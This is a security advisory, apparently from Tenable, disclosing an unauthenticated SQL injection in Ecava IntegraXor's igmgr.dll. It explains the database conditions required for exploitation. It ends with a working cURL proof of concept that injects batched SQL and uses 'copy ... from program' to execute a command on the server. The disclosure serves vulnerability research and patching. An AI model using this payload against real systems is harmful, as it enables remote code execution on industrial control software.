[R1] Ecava IntegraXor SQL Injection Remote Code Execution

While working on a plugin for CVE-2016-8341, Tenable discovered a new unauthenticated remote SQL injection vulnerability in igmgr.dll. The specific flaw exists in the CDatabaseGroupManager::GetReport() function when handling the report parameter in a getdata request. The functions fails to properly validate the user-supplied string before using it to construct an SQL query.

Based on the way the SQL query is constructed it appears that the SQL injection can only work with a database server with the following characteristics:

• The SQL keyword index can be used as a column alias (i.e., select idx as index).
• If the keyword index cannot be used as a column alias, the database must support batched queries (i.e., multiple SQL statements separated by semicolon) and will execute the second or later SQL statements even if the first statement fails.

Tenable believes PostgreSQL, MySQL, and MariaDB satisfy these requirements. Other supported databases may be vulnerable but they were not tested.

Finally, to successfully exploit this vulnerability the remote attacker needs to know the endpoint to attack (e.g. /MyProj/getdata). The following cURL request demonstrates the vulnerability by executing the dir command on the remote host:

[echidna@monotremata ~]$ curl 'http://192.168.1.1:7131/MyProj/getdata?function=sql&dbgroup=1&dbname=REPORT&report={type:%22summary_opt%22,name:%22report1%22,interval_type:%22month%22,interval:1,from:%222010-02-16%2000:26:10.026%22,to:%222010-02-17%2000:26:10.026%22,tag:[%22part_a%22],summary_type:%22foo%20from%20(select%20NULL%20as%20idx,NULL%20as%20tag_name,NULL%20as%20foo)%20b%3b%20create%20table%20if%20not%20exists%20evil%20(a%20text)%3b%20copy%20evil%20from%20program%27dir%27%20-%22}&outfmt=json'